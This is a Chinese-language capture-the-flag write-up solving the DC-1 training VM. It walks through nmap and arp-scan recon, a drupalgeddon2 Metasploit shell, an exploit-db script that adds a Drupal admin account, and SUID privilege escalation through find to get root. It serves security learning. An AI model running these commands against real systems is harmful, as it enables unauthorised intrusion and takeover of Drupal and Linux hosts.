DC-1靶场
靶场下载地址
目标:总共有五个flag,但最终目标是在 root 的主目录中查找并读取thefinalfalg。
前置工作:下载之后用vmvare打开,设置成桥接模式,用的kali也设置成桥接模式
1.开始-nmap扫描
打开DC-1机器,发现需要登陆。这是谜题的一部分,不知道用户名和密码,只能先放着
进入最常规部分,namp扫描,但是我们不知道DC-1的IP地址
使用 arp-scan快速扫描局域网iparp-scan -l
扫描出对应IP和MAC地址
此处查看MAC地址
因此192.168.10.151是目标地址
nmap 扫描端口nmap -sV 192.168.10.151
(22,80,111开放)
2.枚举
- 尝试22端口ssh登陆,失败
- msf 搜索rpcbind,有一个利用漏洞,但是是拒绝服务攻击,没啥用
访问80端口,是一个页面
看一下指纹
使用dirsearch 扫描,发现robots.txt,里面有一些地址,但是一个个进去看,发现没什么用
接着就转到drupal这个cms上,msf搜索expsearch drupal
挨个尝试exp, drupalgeddon2拿到了shell。
输入shell 获取shell
输入python -c 'import pty;pty.spawn("/bin/bash")'
获取bash
flag1.txt让我们寻找CMS的配置文件,百度一下
找到了flag2和默认数据库密码
它说除了暴力破解,还有其他方法连接数据库
连接数据库没成功,尝试其他方法
发现别人使用searchsploit寻找exp,找到一个增加管理员用户的searchsploit -p 34992.py
查看详情
使用cat命令,看一下源码,看看用法
因此使用python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t [http://192.168.10.151](http://192.168.10.151) -u admin1 -p admin1
来新增一个用户
使用添加的账号密码登陆
下面发现flag3
是让我查看shadow文件吗,普通用户无权限查看
3.提权
LINUX提权之SUID提权篇 - 掘金
flag4暗示我们进行提权,使用find命令查看可以提权的命令(执行一条即可)
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
就用find提权吧
cd /tmp
touch test
find test -exec /bin/sh \;
whoami
显示root权限
进入root目录,找到最后flag